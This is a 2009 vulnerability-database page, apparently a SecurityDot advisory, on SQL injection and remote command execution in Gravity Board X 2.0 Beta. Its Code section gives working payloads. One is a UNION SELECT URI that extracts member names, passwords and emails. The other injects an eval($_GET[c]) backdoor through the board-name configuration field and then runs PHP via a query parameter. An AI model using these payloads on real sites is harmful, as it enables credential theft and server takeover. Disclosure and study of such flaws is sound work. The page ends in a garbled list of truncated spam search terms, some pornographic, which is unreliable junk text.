about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Gravity Board X Multiple SQL Injection Vulnerabilities and Remote Command Execution Vulnerability


Title Gravity Board X Multiple SQL Injection Vulnerabilities and Remote Command Execution Vulnerability
Published 2009-04-03-12:00AM
Updated 2009-04-06-06:46PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  brain[pillow]
Vulnerable  Gravity Board X GBX 2.0 Beta
Not Vulnerable  
Code  Attackers can use a browser to exploit these issues.The following example URIs and data are available: SQL-injections:http://www.example.com/index.php?action=viewprofile&member_id=slider-http://www.example.com/index.php?action=viewboard&board_id=m0nzt3r-loleg-too'+union+select+0,concat_ws(char(58),displayname,pw,email),2+from+gbx_members+where+1='1Code exec Go: http://www.example.com/index.php?action=configure
Enter Board Name: xXx";if(isset($_GET[c]))eval($_GET[c]);#
Go: http://www.example.com/index.php?ok=phpinfo();
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Mon, 09 Nov 2009 12:51:34 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
200 /compo www.js-cul www.jinanb SREYASEX.C sxey vedio www.Sexmov shakila ho wow Patc news for c sleep girl www.milta filmsex www.sublim weblogic jshuwei.or HTTP 1.1 Wiled sex 52semm.6te indianxxxp CMS is Fre angelina g sixygirls Pito.pul SEX 3GP mambo Remo lo154l cat list www sex mo Phoneeroti MS06-008 200 /compo www.leilon UBB.thread joomla rem mambo Remo dp.xx666.o www.hot vi indianxxxp zhugecaoma PleskContr Phoneeroti +www.trish www.sex.am 200 /compo +Powered+b cheetachat Sex boys t369t kajol sexy WWW.world